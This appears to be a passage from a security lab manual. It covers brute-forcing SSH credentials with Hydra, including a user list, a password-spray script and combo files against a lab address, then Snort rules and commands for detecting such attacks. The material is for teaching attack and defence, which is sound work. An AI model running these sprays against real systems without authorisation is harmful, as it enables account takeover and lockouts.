Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the
passwords of network services.
How to Install Hydra
Hydra comes pre-installed with Kali Linux and Parrot OS. So if you are using one of them, you can start working with Hydra right away.
How to Work with Hydra
Let's look at how to work with Hydra. We will go through the common formats and options that Hydra provides for brute-forcing usernames and passwords.
$ hydra -h
This will give you the list of flags and options that you can use as a reference when working
with Hydra.
Let's assume we have a user named "molly" with a password of "butterfly" hosted at 10.10.137.76. Here is how we can use Hydra to test the credentials for SSH:
Next, put the following usernames in a file, one per line:
root
admin
user
molly
steve
richard
Now we are going to test which of these users has the password "butterfly". Here is how we can run a password spray attack using Hydra.
We will get a result similar to the following output if any of the users matches the given password. Notice that we have used the flag -L instead of -l: -l is for a single username and -L is for a list of usernames.
If this attack is successful, we will see a similar result to the other two commands.
Hydra highlights the successful username/password combinations in green for all the matches.
We can also use the debug (-d) flag to gather even more information. Here is the same result
when using the debug flag:
Service specification
Instead of specifying the service separately, we can combine it with the IP address as a URL, for example ssh://<target> when brute-forcing SSH.
If Hydra's session exits while an attack is in progress, we can resume the attack using the -R flag (which reads the hydra.restore file) instead of starting from scratch.
$ hydra -R
Targeted combinations
If we have a list of usernames and passwords, we can implement a dictionary attack. But if
we have more information on which usernames are likely to have a set of passwords, we can
prepare a custom list for Hydra.
username1:password1
username2:password2
username3:password3
We can then use the -C flag to tell Hydra to run these specific combinations instead of looping through every user and password.
Here is the syntax.
We have seen how to work with Hydra in detail. Now you should be ready to perform real-world audits of network services like FTP, SSH and Telnet; remember that brute-forcing is noisy, can lock accounts, and is only legitimate against systems you are authorised to test.
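The Hydra invocations this section describes, written out as an added example (not from the lab manual or the Hydra project): the single-credential check, the password spray with -L, and the targeted -C run built from a user:password file. Target and credentials are the ones assumed in the text (10.10.137.76, molly/butterfly); the list files are constructed. Hydra itself is only called inside the wrapper functions, so the file-building helpers work without it.

```bash
#!/bin/bash
# Added example: the three Hydra runs from this section, plus a combo-file builder.
# Target and credentials are the assumed lab values; list files are constructed.
TARGET=10.10.137.76

# Single user / single password: verify molly:butterfly over SSH.
# -t 4 keeps to four parallel tasks, which is what Hydra recommends for SSH.
hydra_check_single() {
    hydra -l molly -p butterfly -t 4 "ssh://$TARGET"
}

# Password spray: one password (-p) against a user list (-L instead of -l).
hydra_spray() {   # hydra_spray <users-file>
    hydra -L "$1" -p butterfly -t 4 "ssh://$TARGET"
}

# Targeted combinations: -C takes "user:pass" lines and tries only those pairs.
hydra_combos() {  # hydra_combos <combo-file>
    hydra -C "$1" -t 4 "ssh://$TARGET"
}

# Resume an interrupted run from hydra.restore in the current directory.
hydra_resume() {
    hydra -R
}

# write_user_list <out> : the user list from this section; prints the line count.
write_user_list() {
    printf '%s\n' root admin user molly steve richard > "$1"
    grep -c . "$1"
}

# make_combo_file <users> <passwords> <out> : pair line i of each list as user:pass
# (assumes the two lists are aligned, like the username1:password1 example).
# Prints the number of pairs written.
make_combo_file() {
    paste -d: "$1" "$2" > "$3"
    grep -c . "$3"
}
```

Against a server running the Fail2ban jail from the previous exercise, hydra_spray will get the attacking address banned after maxretry failures; that is the expected interaction between the two tools, not a Hydra fault.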
Result:
Thus the procedure for launching brute-force attacks on the Linux server using Hydra was carried out and tested.
Aim
To learn how to perform real-time network traffic analysis and data packet logging using Snort.
About Snort
Snort is a widely used open-source intrusion detection and prevention system (IDS/IPS). It is
capable of performing real-time network traffic analysis, detecting various types of network
attacks, and logging data packets for further analysis.
1. Installation:
Start by installing Snort on a system of your choice. Snort is available for various operating systems, including Linux, Windows and macOS.
2. Rule Configuration:
Snort uses rules to detect and identify various types of network traffic and attacks.
3. Real-Time Traffic Analysis:
Snort continuously monitors network traffic on the specified interfaces in real time.
4. Alert Generation:
Snort can generate alerts when suspicious or malicious network traffic is detected.
5. Packet Logging:
Snort can log data packets for further analysis and investigation.
Packet logging allows for in-depth analysis of network traffic, identifying attack vectors, and
understanding the nature of network-based threats.
The generated alerts and logged packets can be further analyzed using various tools and
techniques.
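To tie the five points together, here is an added example (not from the lab manual or the Snort project) that writes a small local.rules file covering alerting, a brute-force threshold and packet logging, then wraps the Snort 2 command lines for testing the configuration, running in IDS mode and logging packets. The SIDs, paths and interface name are assumptions; the rules use the $HOME_NET/$EXTERNAL_NET variables defined in snort.conf.

```bash
#!/bin/bash
# Added example: a minimal local.rules plus the Snort 2 command lines that use it.
# Paths, SIDs (local rules start at 1000000) and the interface name are assumptions.
RULES_FILE=${RULES_FILE:-/etc/snort/rules/local.rules}
SNORT_CONF=${SNORT_CONF:-/etc/snort/snort.conf}

# write_local_rules <file> : three rules; prints how many rule lines were written.
write_local_rules() {
    cat > "$1" <<'EOF'
# Alert on every inbound SSH SYN (one alert per connection attempt)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"SSH connection attempt"; flags:S; sid:1000001; rev:1;)
# Alert only when one source opens more than 5 SSH connections in 60 s (brute-force indicator)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"Possible SSH brute force"; flags:S; detection_filter:track by_src, count 5, seconds 60; sid:1000002; rev:1;)
# Log (do not alert) ICMP echo requests so the packets are kept for later analysis
log icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP echo request"; itype:8; sid:1000003; rev:1;)
EOF
    grep -c -E '^(alert|log) ' "$1"
}

# rule_sids <file> : list the SIDs, useful to check for duplicates across rule files.
rule_sids() {
    grep -o 'sid:[0-9]*' "$1" | cut -d: -f2
}

# Validate the configuration (and the rules it includes) without sniffing.
snort_test_config()  { sudo snort -T -c "$SNORT_CONF"; }
# IDS mode: real-time analysis on an interface, alerts to the console, logs under -l.
snort_ids_mode()     { sudo snort -q -A console -c "$SNORT_CONF" -i "$1" -l /var/log/snort; }
# Packet logger mode: capture everything on the interface in tcpdump (pcap) format.
snort_packet_log()   { sudo snort -b -l /var/log/snort -i "$1"; }

# Typical sequence:  write_local_rules "$RULES_FILE" && snort_test_config && snort_ids_mode eth0
```

Run the Hydra spray from the previous exercise against the monitored host and sid 1000001 fires for every attempt while sid 1000002 fires once the threshold is crossed; the pcap from snort_packet_log can then be opened in Wireshark to see the individual SYNs.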
Result:
Thus real-time network traffic analysis and data packet logging were performed with the Snort IDS.